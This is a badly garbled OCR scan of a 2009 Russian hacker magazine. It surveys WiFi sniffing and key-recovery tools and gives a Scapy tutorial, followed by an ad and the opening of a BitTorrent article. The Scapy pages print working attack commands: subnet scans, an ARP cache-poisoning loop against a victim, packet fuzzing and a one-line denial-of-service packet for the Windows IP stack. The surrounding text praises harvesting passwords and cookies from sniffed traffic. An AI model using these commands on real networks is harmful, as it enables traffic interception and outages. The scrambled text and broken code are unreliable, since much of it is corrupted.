ний), а таюке [и это самое вкусное) самая токолов (сейчас поддерживается более 701. i.~,. .._c ....... 8« ... Id......
!i I)~ct: 'H. _
разная инфа, передаваемая В открытом виде Более того - можно полностью воссоздать
~ _.~,

по сети: пароли для незащищенных прото­ ТСР-сессию и ПОClo10треть, к примеру, НТТР­ I~~~ОО1»~~~.u;-~")r,"~ оо...'(Х,,"а,оо..:о:.11d5t )О.хх.ю:ili.1:ХХ,ю:
ТСI':Ы.1».а".е.)JЮ~
..
ln.I6&.1.2....4m)
I ... Q<.n:lt",::.<II(;<>(/~""_~<1,,,,,It<I'!O!r;1A'IJ·\luwaLl
...

колов [pop3!ftp!te lпесl, почтовы й трафи к, htcp трафик со всеlo1И запросами и соответствен­ 1:--­ __
J ~~~QO~{-~0?'~='S'Sl'C .. ОО-_'О:сХХ:3<II,хх,хх<!woОО>Jt.'(:.\Ххх,де.7
кукисы и данные для авторизации, и т,д но интересной инфой, вроде данных для 1~~:i~i~~~~,>I':fl.Lt>'J.1.24 ..tvr'.з
Единственный недостаток WifiZoo заключа­ авторизации. Весь перехваченный трафик

1
~~Q.о~~~..жI~Dw~'.W'.:.:...:tb:>AJt.:!.IюшпL'tb.L4~dd'N
i'<tIb-Jt:\.I.Il

ется в отсутствии режима Channel hорр,пg. может быть сохранен в файл для последую­

8 результате прога може'г прослушивать бес­ щего анализа. что особенно радует - это

проводной интерфейс, но не может прыгать гибкая система фильтров, которая позволяет

с канала на канал. Этот недостаток с лихВой отбрасывать ненужные пакеты и перехваты­

вать только то, что нужно, А настраиваемые

аfWSAPf<>jЩ.-Е'Q<'rU,()ftWttеleы.~I)'k.>d,'!Or ~ ПРОСМАТРИВАЕМ ЧЕРЕЗ GШ­

"'eAt6D... ~_!!"!,, __ ~
И!НТЕрФЕЙС КУКИСЫ, ПЕiPЕХВА­
'~~.'iii~ ~O
(r~~(f~
f,"jO:<;!
OV~n;<~;«! ~J·,.,"":,,nl
~'~Jt~!
itJ~.r..<\'; 11'''0.. _1: ~},.o.~"I~,
"P'~~~

1-kl91"~">
ЧЕННЫЕ С ПОМОЩЬЮWIFIZОО
QIoOdO",6In.:4-'I ,_11II.: tl'/(II1~","II:51J

'''~
AV'""~rj>te<! 1'JZlII
.~ 1'Io:><...... Io=00± ~IIXЦ •
процессора, WSA использует техноло­
~2'"~
...""~ ,..,:;==---=---,_,
..... гию, которая в процессе восстановле­
, Sti:!
0rbJ< Ot:t!I:i A~.
Ow.;"
С!rщ. , ния ключа задействует графические
акселераторы. Тут надо сказать, что
1, сама програМlo1а не перехватыеает тра­

СПЕЦИАЛЬНАЯВЕРСИЯСНИФЕРА
.,~~--=~=·E=~:·~·,.,:,,". .~~
?!
;:~:~::~~= ~~'~2mJOO.r'L2GRJ<:8~']
фик иэ беспроводной се'ГИ, а имеет дело
только с дампом сетевых сообщений
[поддерживаются форматы TCPOUMP,
'::-:---------~._-----~:;,.:..
COMMVIEW ДЛЯ РАБОТЫ В БЕС­ ПО ЗАЯВЛЕНИЮ РАЗРАБОТЧИ­
CommView. PSPR). Т.е работает в связ­
ПРОВОДНЫХ СЕТЯХ ке со снифером. Важно, что для уско­
КОВ, СКОРОСТЬ ПОДБОРА WPA
КЛЮЧАМОЖЕТВОЗРАСТИ В рения вычислений подойдет вовсе не
компенсируется предварительнозапущенным РАЗЫ, ЕСЛИ ИСПОЛЬЗОВАТЬ любая карта, а только топовые модели

Кismet'o,~. Перехваченныеданные утилита ВОЗМОЖНОСТИСОВРЕМЕННЫХ ускорителей: NVIDIA IGeForce 8.9.200 и

бережливо складывает в папку logsl. ука­ ГРАФИЧЕСКИХАКСЕЛЕРАТОРОВ вышеl или ATI (RADEON НО 3000 Series
зывая в названии файлов источник данных и BbIIJJe) EWSA поддерживает атаки по
(SSlds,log, cookles.log, hllpauth log и т,д.]. А словарю и поддерживает реЖИI1Ы мута­

для большего удобства в комплекте идет предупреждения поэволяют сообщать поль­ ции пароля Iнапри,~ер, слово password
GUI-интерфейс, реалv.зованныЙ в виде веб­ зователю о важных событиях, таких как подо­ за,~еняет на plassword и т.д.)
сервера, который по Уlo10лчанию поднимается зрительные пакеты, высокая загрузка сети

~1~~~i~~~fY~~~tlц t il sl
на 127.0.0 1:8000. или неизвестные адреса. Словом, вам отлич­
~Iая программа для винды за исключением

COMMVIEW FOR W'1F.1 одного - она платная. wlreLess_key.htmL

www.tamps.ru ,. Уже са м не раз сталки вался С cVlTya­
products/commwlfl WIRELESS SECURIТY цией, когда тупо забываешь ключ от
Специальная версия известного виндовоrо AUDIТOR собственной Точки доступа. Кажется,
снифера CommView, созданная для захвата www.elcomsoft.ru это была строчка из Лермонтоеа? Черт,
и анализа сетевых пакетов в беспроводных Еще одна платная, но очень любопытная или Пушкина? Не помню Моментально
сетях 802 l1a/bIg/n. Утилита получает инфор­ разработка Wlreless Sесuпtу Audltor освежить паlo1ЯТЬ помогает утилита

мацию от беспроводногосетевого адаптера позволяет проверить надежность (да, WlrelessKeyView. которая ebITacKVlBaeT
и сразу декодирует анализируемыеданные, теперь ато так называется' .JI WPA! из реестра сохраненные в системе WEP!
отображая их G удобном для переваривания WPA2, но используя современные Io1ETO­ WPA ключи, Приятно, что WlrelessKeyVlew
виде. В случае необходимости, пакеты можно ДИКVI для вычислений С помощью гра­ работает как с сервисом Wlreless Zero
дешифровать с использованием пользова­ фических процессоров. В дополнение к Conflguration в W,nXP, так и WLAN
тельских ключей WEP или WPA-PSK и деко­ режиму, когда восстановление ПрОИЗEiО­ AuloConflg, KOTOPЫ'~ пользуются юзеры
дировать вплоть до самого низкого уровня дится средствами только центрального Висты. I

ХАКЕР Qb 1126/ Q9 ~ 027

 х 5[АРУ

5[АРУ J х

х 5[АРУ

xEEi8
СТЕПАН «ST~» И~,~~Н

~АБОТА
ХEEi8 х

J
еоеКАЛЬПЕЛЕМ
РАЗБИРАЕМСЯСУТИЛИТОЙSСАРУ

Как можно воплотить снифер, фазер и конструктор пакетов в одной

утилите? Создатели Sсарудоказали, что это возможно. Работа через
текстовый интерпретатор, возможно, испугает большинство пользо­
вателей. Но мы, освоив простой синтаксис, сможем ей одной заме­
нить множество специализированныхутилит.

• Основное назначение Scapy - мани пулиро­

вание пакетами. Ноэти функции реализованы

зоЕателем осуществляется ",е 4ерез ключи

в кома",д",ой строке, а через и",терпретатор

лиззции известных приемов, способных заме­

нить массу других утилит, Тут надо сказать, что

настоль толково, что вкупе с используемым Python'a. Необыч",ый подход сначала может прога изнзчально написана для никсов, и под

интерпретатором Python, можно выполнять смутить, но когда разберешься с простым тем же Llnux'oM запустится с пол пинка, а вот

ряд самых разнообразных задач: начиная от синтаксисо,~ и осознаешь, 4ТО к твои,~ для ИСПОЛЬЗ0ва",ия виндового порта придется

банального сканирования портов и закаН4И­ услугам предоставляется еще и вся мощь чУ1Ъ попыхтеть.

вая сложными приема ми для определения Python'a, вдруг понимаешь' «А еедь удобно, Первое, что потребуется, - это устаНОЕлен­

инфраструктуры сети. В итоге получаем черт подери l И как это другие до этого не ный в системе интерпретатор Python. Тут не
одну еди нствен ную утил иту, которая может додумалисы
>.. надо спешить и ска4ивать самый последний

заменить такие известные тулзы, как nmap, релиз. Во-первых, Scapy написан на второй
arpspoof, arp-sk, агрiпg, tcpdump, tethereal, СОВЛАДАЙ С ВИНДОЙ!
ветке Рythоп'а, а поэтому можно даже не про­

pOf. И бол ее того - готова подстроиться под Чтобы не грузить тебя теорией, предлагаю
бовать запускать ее на последнем З.х билде. А.
са м ые спеЦИфИ4еские ситуаци и. сразу взять быка за pora и разбираться с про­
во-вторых, для корретной работы програм,~ы
Вообще, Scapy сильно ОТЛИ4ается от многих граммой на конкретных при мерах С",ачала мы
придется установить несколько дополнитель­

других утилит Она работает в текстовом разбере,~ся, как просто составлять и отправ­
ных модулей. некоторые из которых имеют
окружении, однако взаимодействие с поль­ л\пь пакеты
в сеть, а потом посмотрим на реа­ портированн ые версии только для 2.5 релиза.

~ 028 ХАКЕР 06 {1 26/09

 х
х х
ОБЩЕНИЕСО SСАРVО(УЩЕСТВЛЯЕТСЯЧЕРЕЗ ИНТЕРАКТИВНЫй
ИНТЕРФЕЙС, РЕАЛИЗОВАННЫЙС ПОМОЩЬЮИНТЕРПРЕТАТОРА
PVTHON
Если версия будет отличаться, их инсталлятор
l)'по обломает тебя с установкой, сославшись
на отсутствии в системе нужной сборки питона.
Небольшие манипуляции IЗ реестре могут помочь
ЭТО побороть, но никто не гарантирует даль­
нейшей 100% совместимости. Короче говоря,
чтобы все прошло гладко и далее работало беэ
проблем, рекомендую тебе следующий наБОР4ИК
[весь он, само собой. есть на нашем DVD),
• Собственно сам Scapy для винды;
• Pytnon 2.5Iw'NW.python.org);
• расш и рения интерпретатора PYWI п32
I tnОП.пеl crew mllammond v"iп32],
• драйвер для перехвата па кетов WinPcap
4.02 ['V'Nw.wiпрсар.ог.g);
• рурсар - модуль работы с драйвером Рсар
[code. 9009 le. сот!р!рурса pl;
• libdnet Icode.google.com/p!libdnetl;
• pyreadline Iiруthоп.sсiру.огg!rт1Оiп/
пляр обьекта. Мы можем создать обьект для
РуRеаdliпе/1пtго];
каждого слоя, опционально задать некоторые
Помимо этого можно установить ряд допол­
ХАЦР 06 1126/ 09
S[RPY
качестве примера создадим TCP/IP-пакет для
22 порта.
»> a=IP ( (1)
»> а
<IР 1>
>>> а.Ш [21
64
>>> a.ttl=32 (3)
нительных модулей, 4тобы открыть пару »> а
дополнительных возможностей Scapy. <1Р tt1"'32 1>
Подробнее о них можно прочитать во врезке. »> b=TCP(dport=22} (4)
»> с=а!Ь (5)
ПЕРВЫЙ ЗАПУСК >:» с
После установки в системе будут прописаны <IP frag=O tt1=32 proto~TCP
ассоциации для запуска Руthоп-скриптов, позто­ 1<ТСР dporl=ssh 1»
му можно просто перейти в папку со 5сару и в
командной строке набрать: scapy.py [или pytnon Сначала 11) действием мы создаем экзем­
~I. Как я уже сказал, не стоить ждать под­ пляр I Р-пакета и сохраняем его в перемен­
сказки со списком ключей для запуска - вместо ную а. Важно, что все зна4ения IР-пакета
зтого ты окажешь внутри текстового окружения. выставляются по умолчанию - зто делает
По сути, это интерпретатор Руthоп, сдобренный сама Scapy. Причем зна4ения по умолча­
специальными функциями Scapy. Можешь вве­ нию не отображаются пользователю далее,
сти команду l5[]. после 4его оБОЛ04ка должна когда он просит интерпретатор вывести его
вернуть список протоколов, с которыми она под­ пара метры. Посмотреть значение нужного
держивает работу: поля можно, обратившись к атрибуту нуж­
ного обьекта [21 Изменим его на значение
»> 1s( 32 i3! и с помощью следующей команды
ARP ARP убеДИМС51, что ИЗМ'енение прошло успешно
воотр ВООТР Далее создадим ,еР- слой, ПРИСВОИ8 его
DNS DNS переменной Ь и установив значение поля
dport [порт назначения] равным 22 Далее
слепим вместе переменные а и Ь, используя
оператор!, чтобы получить готовый тер!
необходимо понять для себя несколько IР-пакет, к которому можно обратиться
вещей: 4ерез переменную С. Заметь, что некоторые
1. Каждый пакет - это обьект, у которого есть поля IP автоматически ПОМНIЯЛИ значе­
поля-атрибуты для редактирования, а также ния, чтобы инкапсулировать тер-слой. Тут
методы для различных действий с ним. стоит сказать, что значения полей вовсе
2. Scapy может работать на разных уровнях необязательно должны быть корректными
модели 051· втором и третьем. Важно пони­ - указав заведомо неверное значение для
мать. что данные с запросом ONS сна4ала одного или нескольких полей, мы очень
инкапсулируются внутрь UOP-пакета (потому просто получаем ГОТ08ЫЙ фаэзер [о фаззинге
как протокол DN5 используетдля передачи поговорим нижеl! В конце КОНЦО8, никто не
данных UDP). далее уже UDP-пакет инкапсу­ заставляет создавать Ку4у переменных для
лируеТС51 внутрь IР-пакета, и в конце концов каждых слоев, все можно уместить 8 рамках
зта сборная солянка размещается внутри одной строки:
Еthегпеt-фрейма Получается слоеный пирог, О
чем СТОИТ помнить, когда работаешь со 5сару. a=Ether () ПР (dst= "'i-1w,,]. xaJ;.ep. r'u) /
Наш первый сетеваой пакет, как и все TCP()!"GET !index.htm1 HTTP/l.O
остальные, разделен на слои, и каждый слой \п\n"
гl редставляется в Python!Sca ру ка к зкзем­
в зтом прим~ре мы добавляем еще один
СЛОЙ - канальный, на котором передаЮТС51
параметры и обьединить их в один па кет. В фреймы Etnernet.
~ 029
 х

» pc_zone

IEthenIot11
I~~
'УР<

(]в
vt!1~ioo
.101
х ,,,".,.
~ warning ""
1D,t
,,'
,..to
При всем функцио­
нале, надо признать,
..,
<:Ilbufll

Of)t1o:.s

что у Scapy есть и ряд ~

недостатков, Прежде ,,,,,"'"

"М
("1\11.",,,,
всего, стоит помнить, ~
jnit.oooki~

что тулза ... ап исана на Ir~p.cooloj~

~1<t.p.:Iytl);]d
~~'rsiQn
Python с несколькими txC~,type
fl~~
уровнями абстрак­
"
Itngth
ции, и работает это IISAKMtJ ра,tо.юl РЕЗУЛI:) ТЗО-МОДЕЛИРDВАНИЯ
'Ii:!xt.p.oylo.ad
... е очень быстро, ~

klrlJl.l1
TRACEROUTE'A
Скорость передачи "'"
пакетов В 6 Мбит/с ВИЗУАЛИАЗАЦИЯIlЕРЕХВАЧЕННЫХ
- пожалуй, верхний ДАННЫХСТАНОВИТСЯДОСТУПНОЙПО(Л~ всем возможным и интересным для нас назначеНИАМ.

предел. Болеетого, УПАНОВКИДОПОЛНИТЕльныхмаДУЛЕИ Если пройтись по портам назначеНИА ТСР, то получаем

в случае работы с различного рода сканер тер-портов, в зависимости от

большим количе­ СОЗДАЕМ флагов. которые будем отсылать в па~ете, Если отправ­

СТвом па кетов может
потребоваться много
памяти,
ПОСЛЕДОВАТЕЛЬНОСТИПДКЕТОВ лять пакеты на удаленный IP-аАрес по ICMP, ТСР или
Ровно как и обычный пакет, несложно создать и после­ ARP, получаем соответственно ТСР-J'ИНГ,
довательности пакетов. За примером использования IСМР-пинг и АRР-пинг. А если сканировать значеНИА
далеко ходить не нужно, ведь создав последовательность TTL, то получаем утилиту traceroute. Словом, можно
ТСР-пакетов на различные порты, МЫ получаем ГОТОВЫй сделать очень многое, и все завиоп от твоего вооб­

порт-сканер, И от этого лишь радужнее тот факт. что ражения.

последовательностьпакетов можно созда1Ъ одной строч­

кой, указав для конкретного поля не значение, а массив ПРИЕМ-ОТПРАВКА ПАКЕТО8
из нескольких значений Пакеты, созданные подобным Как конструировать пакеТы из нескольких уроаней, мы
образом, называются неявными. разобрались, Теперь осталось за маЛЫf, - отправить
~ dvd пакеты в сеть И. возможно, получить на них ответ. Как я

8се, что нужно для »> pkLs = IР(tt1=[l,З,5,(7,10)))!'l'С['(

уже сказал выше, Scapy может работать на двух разных
работы СО Scapy, ты »> pkts
уровнях сетевой модели 051, для каждой из них 'использу­
найдешь на нашем <IР frag=O tt1=rl, З, 5, 17,10))
еТСА своя функция для отправки Функция sendlJ отправит
ОУО. Там же будут proto=TCP 1<'ГСР 1»
пакет на З уровне: она сама выберет нужный интерфейс
при меры сценари­ »> (pkt for pkt :Сп pkts]
и варианты роутинга, В качестве пара метра надо указать
ев для различн ых [<IP frag=O се1=1 proto=TCP I<TCP 1», пакет или переменную С уже сконструированным пакетом:

приемов(напри­ <IP frag=O tt1=З proto=TCP I<TCP 1»,

mep,DNS-спуфи ... г], <IP frag=O tt1=5 proto=TCP I<'ГСР 1», sелd (IР (аз!;=" 1. 2. З. 4") псмр () )
а также примеры <IР frag=O ttl=7 prot,o=TCP I<TCP 1»,
Руthоп-сценариев <IР frag=O tt1=8 proto=TCP I<TCP 1», Функция sendpl) работает на втором уровне, поэтому
С использованием <IP frag=O 1::1::1=9 proco=TCP 1<1'CP 1», выбор правильного интерфейса и протокола будет на
Sca ру как модуля, <IP frag=O tt1=10 proto=TCP 1<тср 1») тебе

в итоге получаем семь ТСР!lР·пакеТОЕ с ПL 1, 3, 5, 7. 3. 9 и 1О, 5ЕND(IРID5Т=»1.2.З.4»)/lСМРIJJ

»> sелdр(Еthеr(}/

»> IP(dst="192.168.*.1-10")!IСМР( } IP(dst="1.2.3.4".tt1=(1,4)), iface c "eth1")

<IP frag=O prot.o=ICMP dst=<Nel:: 192.168,0­
2.*> I<ICMP 1» Sent 4 packecs.

С помощью де САТИ созданных IСМР-пакетов мы простым Тут надо сказать, что на практике гораздо чаще встре­
Пингом сканируем первых деСАТЬ адресов каждой из под­ чаются ситуации, когда нужно не только отправить

сетей 192 163. пакет, но и ПрИНАТЬ ответ от удаленной стороны

Поэтому в 5сару разумнее использовать специальную

»> IP{dst='192.168,4.0!24")/
функцию для отправки [send] И приема [reCleve] пакеТ08
TCP(dport=(O,1024) )
sr[J. Эта функция возвращает два набора' первый - из
<IP frag=O ртоСо=ТСР dst=<Net
отправленных пакетов и полученных на них ответов:

192.168.4.0124> I<TCP Gport=(O. 1024} 1»

второй - набор пакетов. ответы на которые не были
Всего одна cтpo~a нужна, чтобы выполнить ТСР
всех привилегированных портов [от о до 1024] в под­
сети 192.168.4 0/24, По сути, для любого сканирования
нам надо взять ~a~oe'TO ~OH~peTHoe поле И пройтись по
получены. ДругаА фУНКЦИА sr1 [1 является вариацией
SYN первой с той лишь разницей, что принимает только
один ответный па кет. Надо сказать, что эти функции
работают на третьем уровне, поэтому и пакеты ДОЛж­
ны быть соответCI'ВУЮЩих протоколов [IP, ARP! Если

~ 030 ХАКЕР 06/1261 09

 х

" С:\WINООWS\systеmЗ2\сmd.ехе . sca~y.py .

len : S)lo1'tField '" (Нопе>
флага А. Далее легко получаем список Получаем ответы на широковещательный
с})ksшrl : >:S}lol'tField '" (Нопе)

» ) anS,l.tnan$ =:a'p(Et}lel'(d~t="ff:ЕЕ :ЕЕ: ЕЕ :ЕЕ :ff")/A

открытых портов из массива с принятыми АRР-запрос и выводим результат в удобо­
OLLt ..2)

egin eAi~sion:
ответами: читаемой форме.
Fini~)led to ~end 256 pac)(ets.

»> [or s.r in апв: ans.summary(lambda (S,r):

H~~~ :i~~d' 256' ~~~kets, got [1 an~mel'S, l'CRdin ing 256

»> аПS,l.шаПS"'Sl'р(Еt}lе1'«(\st="ЕЕ:ЕЕ :ЕЕ: ЕЕ :ЕЕ :ff")/A

if s[TCP] .dport r(TCP] r.sprintf("%Ether.src% %ARP.

Begin ClТli~Gion:.

Finis})cd to send 256 packets.

sport; psrc%")

.. *.* " .
. .. print stг(s[ТСР).dроrt) + "
•••••••••••••••••• .м-.
Receiucd 260 packet::;:, got 4: an~H'Cl'S, I'cnaining 252 is unflltered" в Scapy есть уже реализованная функция
»> ans.sttMJ!lёl.1"y(lan1:H:\a ($,1'): 1'.spl'intf(";;:EtJIC1'.$l'
@@,5@,56,cO,OO,OS 192.168.56.1 arpingll, которая реализует тже самое В каче­

~
00'50'56'.h'f?'?a 192.168.56.2
ОО,Ос ,29 'd6 ,91 ,о. 192.168.56.128 Если ответ не получен, вероятно, порт стве параметра ей необходимо лишь указать
00'50'56 '.7'Ьа'67 192.168.56.254
>>> закрыт Поэтому просто отображаем на сегмент сети: arplng[,,192.168·1 '»1 Другой ~'\'Y
РЕЗУЛЬТАТ ТОЛЬКО ЧТО СОЗДАН­ экран номера портов иЗ запросов, на кото­ вариант найти апивные хосты В сети ­ v"
НОЙ ARP PING'A рые ответа не последовало: банаЛЬfiО nрОП!Анговать каждый узел в задан­

/ ты хочешь спуститься до второго уровкя И

оперировать fiапрямую пакетами Ethernet.

»> for s ~n

print str(s['1'CP]
unans:
.dроп) + "
ном диапазоне, что легко выполняетс\! коман­

дой, отправляющей в сеть IСМР-запросы:

/'
802.3. есть фуfiКЦИЯ sгрl] is filtered" »'>

ans.unans=sr(IP(dst="192.168.1.]­

=-'.\ МУТИМ СКАНЕР ПОРТОВ ПОИСК ЖИВЫХ 254")псмр()

Теперь, когда мы умеем отправлять и при­ ХОСТОВ В СЕТИ

03- нимать пакеты, разберем конкретные Еще одна конкретная задача - найти осе Список живых ХОСТОВ получаем из массива
варианты использования Scapy. Начнем со активные маUJИНЫ в локальной сети. Самый с ответами·

сканера портов. О том, как сгенерировать быстрый способ - использовать метод

пакеты для ТСР-сканирования портов, мы ARP Рiпg'а [оБЫЧfiО для этого используетс\! »> аПS.sumюагу(lаmЬdа (s,r):

уже говорили Давай посмотрим теперь, как уже готовая утилита arpingl. Напомню. что r.sprintf("%IP.src% is alive")

Если протокол ICMP блокируется, можно

1·

Допол"н'ител bHble
попробовать использовать различные ТСР
Рiпg·и, например, с помощью ТСР SYN:

модули Ji~RJI~ ~",

Если в систему дополнительно установить рух и MikTex;'fO $сару позволит пщ:троить
<' .' »> ans,unans=srl

IP(dst="192.168.1.*")/

2D-графики и экспортировать их формат PDF: TCP(dporc=80,flags="S")

=зу- .~".
::".-" ~--:­
~>IТ »> p=IP{) ПСМР() Любой ответ будет означать, что узел активен.
»> p·;pdfdump (<<test.pdf»)
." АRР-СПУФИНГ
-:М: процесс передачи IIaKeTOB можно отобразить и в виде 3D-диаграммы. для этого потребуется Не составит труда и использовать клас­

VPython и следУ19Щая команда: сический прием ARP cache роisопiпg,

--'" , -_..- _.~., 't...-.' '=,.-...... _'.. . Т' о которым мы вспоминали букваЛЬfiО в
»> а, u=traceroute ( [«www.python.org».«google .. com» ,»slashdot ·.oi-'g»"1 У' .~. предыдущем номере, в статье "Вскрываем

»> а. сгасе3О () SSL». Смысл в том, чтобы путем засорения

АRР-кеша клиеfiта, заставить ег·о в ,(аче­

у ScapyHeT встроенных функций для опред~ения типа ОС на удаленном хосте, но зато есть стве шлюза использовать совершеfifiО дру­

возможность использовать всю мощь утилИ"Г Nrnap и Queso (их предварительно нужно уста­ гой узел - где мы легко можем установить

новить в систему: Сfiифер Делается зто так:

") »> nmap_fp(<<192.158.0.1») »> вепд( Etherldst=c1ientMAC)/

Беgiп emission: ~ ARP(op="who-hаs", psrc=gateway,

Finished to send 8 pacKets. рдs t =с1 ient) ,

inter=RandNum(10,40). lоор=l )

Received 19 packers, gor 4 answers, rernaining 4 packets

0.88749999999999996, ['DraytekVigor 2000 ISDN rourer']) Впрочем, Scapy позвол\!ет не заморачи­
-у' ..... : ваться и использовать уже реализоваНfJУЮ

() функцию агрсасhерОlSОП IJ, указав в каче­

-ов объединить это с обрабол(ой результата. протокол ARP используется в сети для стве первого параметра свой МАе-адрес, а

из Сканирование с помощью АСК-пакетов определения МАС-адреса по заданному в качестве второго - IP жертвы,

легко реализуется командой: IP-аАресу. Смысл ARP Рlпg·а заключается
в том, чтобы спросить все хосты в локаль­ FUZZING
»:> аПS,uпапs :::
ном сегмеlне их IР-адрес: Ca~~ прием фаззинга прост, как дважды два:
sr (IР (dst= "'f/WW. xakep. сою") /
"подставить в каком-нибудь месте такое
TCP(dport=[80,666J ,flagS="A")}
»> ans,unans=srp(Ether(dst="ff: Зfiачеfiие, которого быть fie может, и поо~о­

ff:ff:ff:ff:ff"}/ARP(pdst="192.16 треть, что будет». Скажем, если флаг в

Нужный эффект fiaM дает использоваfiие 8 . 1 . 0/24" ) , timcou с =2 ) каком-то поле пакета может принимать зна­

16/09 ХАКЕР оь 112М 09 ~ 031

 х
....
...... pc_zonl?

----7 : о
[]равка

- 18!i3
ПQ.'1СК ~A 1SOдировки ~ННT8К(HC Оny,НН

-о :"Q ~ ~ It~ 1!1 ~ е 11!! Св ~ ~ ~ 6 I~ 'п GБо

,.,laKpOCbI запуск TextFX ДОn01D1et1ня O~

@
1
00 [Е ~ Ii 1<§\ d l::J '~
,(Е X/i._06J'C20NЕ_RA80ТАЕ"1...SQ_St:.(lЦ'j;фJ.!Ш IIIE 08'6' 2 ~ .,ping.py
.ч! IlJsr/bln/env p,/1hOn

:fl'om зсару iJnport '*

DB = ()

5carpwatch_callback(pkt):
i:f АЙР in pkt.:

;р,= = plcO [ARP] . рзrс, plcO [ARP] • Ь~эrс

7 i..=f 1р i.n DБ:

8 ;;f ..ас 1= DB[1p]:

1О

11 I i:f Etbex: in pxt:

else:
t-e.rqet pkt (:fther) .dзt

~
12 te.rget =- "~:$?" 'ъ p,kt.[ARP] .pd~t

13 retUl"n "poi~l')ning atcec:J;;: t.C:H=get.::<~s

(target, ip, mзс)

1Б

16
17
18
19
20
i else:
DB[ip]~mac

eli:f' IP in pkt.:
S1p,d1p = pl<t[IP] ."rc, plc~(IP] .dB~
i:f 5ip not in 1>В Ot.' d1p not :in DБ:
~ (Rl8c,ip)

21 ret.urn
22 1:f :E.t.hec in pk't:
23 зmаС/~ас = рk~[Еt.hеr].эrс, рkt(Еthеr].dЭ~
24 eJ.i:f Do~l1in р)сС:
25 рll = p!l:t.[Dool1]

i:f pll.FCfield & 3 == О: #di,ec1

27 sznac,dlnac ~ pll.ad.dr2,pl1.sddrl ~I
х
ПИШЕМ ARP МОНИТОР, ПОДКЛЮЧИВ SCAPY КАК МОДУЛЬ PYTHON'A

х чения 1,2,3. то можно послать 5 - и отследить реакцию. 0001 Ether / IP / ICMP 192,168.5.21 echo­
Как среагирует на такую подставу демон? А как клиент? В rcquest О / Raw
при~щипе некорректные значения можно f'lодставлять и

IЗручную, однако для большего удобства в Scapy реализо­ Обрати внимание, что отправку па кетоlЗ и снифинг можно
вана функция fuzz[), которая преобразует любой коррект, провести всего один раз, а отваты и резупьтат снифинга
ный пакет в пакет, специально заточенный для фаззинга. присвоить переменной, после чего делать с кей все что
~ links Фишка в том, что функция автоматически заменяет все угодно. Столысо раз - сколько потребуется. Получаем
• в е рсия SCQ ру для поля [кроме случаев. когда значение поля должно быть I~ИНИМУМ активности, которая кас может спалить, и макси­

IPv6:1.1..9.-n:blpiiru. подсчитано - например, поля с КО~IТРОЛЬНЫМИ суммамиl мум возможностей по интерпретации 8 нашем примере

hrшgо.widе.аd.jр/ случайными значеliИЯМИ, но подходящими по размеру перехваченные пакеты мы помещаем в массив а, и теперь

~ для этого поля, Разберем при мер: можем обратиться к пюбому па кету, просто указа в его
индекс к примеру, а[1]. Метод пsummагу[l, как видишь,
• Uпit-тестирование »> send (IP (dst=" target") / fuzz (UDP () / выводит общую характеристику перехваченных пакетов.
для Scapy: secdev.org! N'ГР ("ersj.on=4) ) , 100р=1) Перехваченные данные в некоторых случаях удоб­
RIQj.~_c;ts!UTsca ру. нее просмаТРИВдТЬ и анализировать в удоБНОl4 GUI­
в этом случае IР-слой будет самым обычным, в то время как дЛЯ интерфейсе того же Wireshark·a. Для этого перехвачен­
• Инжектирование UOP и NTP [это, кстати говоря, протокол сетевой синхронизации ные пакеты рекомендую сохранить в файл в формате
паl<етов в Wifi: времениl будет использовать фаззинг. Причеl~ контрольная РСАР: wrpcap(<<temp,cap»,pkts). Обратное действие осу­
sid .rstack.org!indg~ сумма в UDР'пакете будет корректной, в Кдчестве порта будет ществляется так. pkts = rdpcapl«lemp.cap»I.
®..QLw.ilitQQ EN. использоваться порт 123 [стандартный дЛЯ NTPI, а версия NTP
будет установлена на 4 [Т.к. она явно задана при соэдании паке­ РАЗ ПЛЮНУТЫ
та!. Остальные поля будут заполнены случайными значениями. Самая главная фишка Scapy в том. что она позволяет
обойтись без написакия новой утилиты. Если для напи­
СНИФИН:Г сания Proof of еопсерt для DoS'a MicrosOft'OBCKOro стека
Не даром мы устанавливалиWiпРсар и модуль для работы IP требовалось 115 строчек на С, то в Scapy это можно
с ним: В Seapy реализованы отличные возможности для реализовать всего лишь одной строкой:
снифинга данных. Основная функция - snift 1], в качестве
параметров которой можно указать интерфейс для про­ send(IP(dst="target",options="\x02\
слушки, задать фильтр и количество па кетов для перехва­ х27 " +" Х" * 3 8) /ТС1? () )
та. Если интерфейс не указан, снифинг производится по
всем интерфейсам сразу. Вот так просто fЮЖНО перехва­ С помощью Scapy реально сотворить все, что угодно Хочешь
тить IСМР-трафик, связанный с ХОСТOI166.35 250.151: сканер портов с нужной тебе логикой - легко добавить
возможность flпgегргiпt'а? Раз плюнуть. А впрочем, почему
»> sniff(filcer="i.cmp апd hosc использовать его только для пентеста? Перехватывая и обра­
66.35.250.151", соuщ=2)
батывая пакеты, можно легко сварганить уникальную IDS­
<Sпiffеd: UDP:O ТСР:О ICMP:2 Other:O>
систему с триггераl1И на любые события. И самое главное ­
»> а=
сделать это очень просто. Скажу больше - никто не обязыва­
»> a.nsummary()
ет тебя постоянно работать череэ интерпретатор. Seapy очень
0000 Ether / IP / ICMP 192.168.5,21 echo­
просто подключить к своему Pythоп-сценарию как модуль и
requesC О / Raw
использовать все ее возможносги на всю катушку! I

~ 032 ХАКЕР 06 /1201 09

Что объединяет Гарри Поттера и Джонни Деппа7
Героев мультфильма «Ледниковый период»
и ретро-боевика «Джонни д» 7

в каЖДОМ номере
DУD с полнометражным
фильмоМ

Все они ждут тебя

в юбилейном номере Total DVD!

100-ый номер журнала Total DVD в продаже с 24 июня

. www.totaldvd.ru
 ДЕСЯТОК CEKPE~OB : о КОТОРЫХ ТЫ НЕ ЗНАЛ

Скачать «горяченький» файл - подчас не такая простая задача.

Обычные хостинги мрут, как мухи, не выдерживая нагрузки, файлоб­
менники жадно клянчат деньrи, а FТР-серваки не дают слить файл
из-за ограничения по количеству пользователей. И только через
BitTorrent можно не только закачать вкусняшку, но и сделать это мак­
симально быстро. Еще большего удобства ты добьешься, воспользо­
вавшись нашими советами .

• Сегодня мы не будем говорить о банальных

~. Новые серии сериаловтеперь под силу

даже домохозяйкам, по картинкам установив­
шим какой-нибудь торрент-клиент. Намного
интереснее разобраться, какуправлятьзакач­
скачать только через tоггепt. Такие фай~ы
обычно по разны;~ причинам быстроудаляются
с ХОСТИI~ГОВ и файловых обменников. Да и просто
обезумевшая свора пользователей нередко
вал,псервер или полностью расходуетеголимит
способ проще. Слить нужный файл черезторрент
подсилуодному лишь браузерувкупес онлайн
инструментом BitLeHv"""i'V.bltlel.orgJ. Это очень
ПРОстой сервис надолишь скопироватьлинк
ДЛЯ торрента в единственное на странице поле,

